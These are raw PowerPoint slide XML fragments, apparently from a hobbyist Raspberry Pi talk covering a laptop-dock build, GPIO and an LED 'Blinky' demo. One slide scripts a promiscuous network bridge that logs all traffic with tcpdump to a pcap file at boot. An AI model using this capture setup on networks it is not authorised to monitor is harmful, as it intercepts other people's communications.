                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eth1 0.0.0.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>promisc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybridge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>promisc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybridge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eth_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eth_netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> broadcast $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eth_broadcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eth1 -s 0 -C 1000 -W 3 -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mycap.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1"/>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9154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it on Start Up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1"/>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1600200" y="361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p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1601244"/>
            <a:ext cx="8229600" cy="3046956"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +x startbridgeandlog.sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>startbridgeandlog.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>May have to set rights so you can download the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +r mycap.pcap0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574020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Raspberry Pi Dock/Laptop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="9067800" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Idea is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>not original to me</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>rpidock.blogspot.com/2012/05/raspberry-pi-and-motorola-lapdock.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Take the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Atrix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> dock, some HDMI and USB adapters, and hook to the Raspberry Pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.amazon.com/AT-Laptop-Dock-Motorola-ATRIX/dp/B004M17D62</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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I used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>this and some splicing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.sparkfun.com/products/9614</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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124200"/>
            <a:ext cx="3352800" cy="273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7830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“Fallopian” Cable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00200"/>
            <a:ext cx="3185210" cy="23968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28800"/>
            <a:ext cx="4556811" cy="3429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319730"/>
            <a:ext cx="6422146" cy="47610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19" y="2286000"/>
            <a:ext cx="5410200" cy="39223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672" y="1290160"/>
            <a:ext cx="5873222" cy="4419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0381" y="1600200"/>
            <a:ext cx="6035335" cy="4541590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3841083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Little Hardware Hacking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781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GPIO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1600200"/>
            <a:ext cx="5029200" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tons of input and output options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Working at 3.3v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="6400800"/>
            <a:ext cx="5314163" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>bogarted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://elinux.org/RPi_Low-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>level_peripherals</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627380"/>
            <a:ext cx="25146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819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Blinky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="1752600"/>
            <a:ext cx="7620000" cy="4627880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln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57" y="1912246"/>
            <a:ext cx="1858245" cy="425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rot="10800000" flipV="1">
            <a:off x="1905000" y="2985108"/>
            <a:ext cx="4114800" cy="89508"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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676400" y="3200400"/>
            <a:ext cx="3886200" cy="112079"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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52501" y="6143588"/>
            <a:ext cx="6324600" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LED From http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.iconarchive.com/show/electronics-icons-by-double-j-design/LED-icon.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="L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73617" flipV="1">
            <a:off x="5594562" y="1926274"/>
            <a:ext cx="2438400" cy="246634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280919" y="6518977"/>
            <a:ext cx="4916731" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>RPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Pinout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>bogarted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://elinux.org/RPi_Low-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>level_peripherals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010481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Blinky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, the Hello World of Electronics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="5638800"/>
            <a:ext cx="39167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dirty="0"/>
              <a:t>Demo Time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1828800"/>
            <a:ext cx="4572000" cy="2952347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"4"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>export</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
